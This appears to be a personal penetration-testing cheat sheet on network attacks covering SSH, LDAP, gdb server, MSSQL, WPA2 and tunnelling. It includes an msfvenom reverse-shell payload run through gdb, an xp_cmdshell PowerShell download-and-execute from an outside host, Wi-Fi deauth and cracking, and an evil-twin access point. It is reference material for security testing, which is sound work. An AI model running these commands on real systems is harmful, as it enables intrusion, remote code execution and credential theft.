Network stuff

Table of Content

Common Protocols
Wireless
Port forwarding and reverse shells
- Chisel
- Socat cheatsheet

Common Protocols

SSH - port 22

Check SSH configuration

ssh-audit for detailed fingerprinting

Bruteforcing credentials

Use metasploit's auxiliary/scanner/ssh/ssh_login or CrackMapExec.

Bypass login shell

To bypass restrictive login shells such as /usr/bin/nologin or /usr/bin/false you can add your own command while connecting upon SSH that will be executed before the user drops into the assigned login shell. /bin/sh is always a good candidate.

ssh user@target /bin/sh

libssh authentication bypass

Use the python script from exploit-db.com or metasploit's auxiliary/scanner/ssh/libssh_auth_bypass to exploit an authentication bypass present in libssh before versions 0.7.6 and 0.8.4 (CVE-2018-10933).

Debian OpenSSL Predictable PRNG (CVE-2008-0166)

At some point in 2008, Debian shipped a buggy OpenSSL implementation. This bug biaised the seeds used by OpenSSL's PRNG, resulting in only 32,767 possible seeds for a given architecture, key size and key type.

g0tm1lk generated the possible keys which can further be exploited with this python script.

Tools & resources

Utilities:

sshuttle: proxy allthethings over ssh.

Configuration guides:

Mozilla's guidelines on OpenSSH configuration.

SSL/TLS

Check SSL/TLS configuration

testssl.sh: very exhaustive checks.
sslscan.
Mozilla SSL/TLS guidelines and configuration generator.

LDAP

Enumeration

Hacktricks on LDAP.

nmap --script="ldap* and not brute" 10.10.10.1 | tee detailed_ldap.txt | grep Context
ldapsearch -x -H ldap://10.10.10.1 -D '' -w '' -b "DC=abc,DC=xyz" | tee ldapsearch.txt

LDAP Pass-Back Attack

This attacks relies on tricking a device to connect to a rogue LDAP server operated by the attacker. The server is configured so that only plaintext credentials are accepted, hence capturing the credentials from the connecting service.

The setup for the attack is described here. Below are the steps for ArchLinux (make sure to check out Arch's wiki entry for OpenLDAP in parallel).

GDB server

It is possible to obtain remote command execution when a gdb instance is listening. There are several exploits available but this can also be achieved manually. To do so we simply transfer an executable onto the target, reverse shells are juicy candidates, and ask gdb to debug it.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf -o evil
gdb
gdb$ target extended-remote <target>:<port>
gdb$ remote put evil evil
gdb$ set remote exec-file evil
gdb$ run

DNS rebinding

-rbndr.us rebinding service.

Crack P12 (PKCS12) certificate passwords

p12tool (go).

Microsoft SQL Server (MSSQL)

Once authenticated, upload and execute a reverse shell with impacket's mssqlclient.py.

mssqlclient.py sa:poiuytrewq@10.11.1.31
SQL> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString(\"http://192.168.119.184:8088/hey.ps1\")"

Wireless

Recon

Turn an interface into monitor mode and start sniffing for networks in range.

# list available interfaces
airmon-ng
ip a
# set interface to monitor mode
airmon-ng start <inferface>
# capture into all_traffic.pcap
airodump-ng -w all_traffic <inferface>mon
tcpdump -i <interface>mon -w app_traffic.pcap

WPA2-PSK capturing and cracking

Select a target network and wait for the capture of WPA2 handshakes.
If needed, activelty de-auth clients to capture handshakes upon their reconnection.
Use aircrack-ng / john / hashcat to crack the WPA2 master key from the handshakes.

# Sniff <bssid> on a single <channel> and store into <target>.pcap
airodump-ng -c <channel> --bssid <bssid> -w <target> <interface>mon

# De-auth up to <nb> stations to capture auth packets for good
aireplay-ng -0 <nb> -a <target bssid> <interface>mon

# Taxi, crack that key!
aircrack-ng -a 2 -w /path/to/dictionary.txt target.pcap

Attacking WPA2-MGT with Evil Twin

It requires two wireless interfaces: one connected to internet or to the target network and another, ideally powerful, interface that will server as an access point. eaphammer can be used to generate a certificate and then run a fake WPA2-MGMT access point replicating the target's ESSID and BSSID. The attacker gets complete control over every client's traffic which connects to the rogue access point without checking the certificate against a trusted one.

$ eaphammer --cert-wizard
$ eaphammer -i wlan0 -I wlan1 --essid "Target" --bssid 01:02:03:aa:bb:cc

Port forwarding and reverse shells

Chisel

chisel is another networking swiss army knife (get precompiled binaries from the release page).

# On local machine
./chisel server -p 7777 --reverse
# On remote
./chisel client 10.10.1.2:7777 R:5985:10.10.3.4:5985

Socat cheatsheet

You can retrieve compiled executables for socat on the wonderful static-binaries project: linux x86_64

First, check out cheat.sh/socat for cool usage tips. Below are the ones I use the most.

skywhi@dreamland:/var/log$ _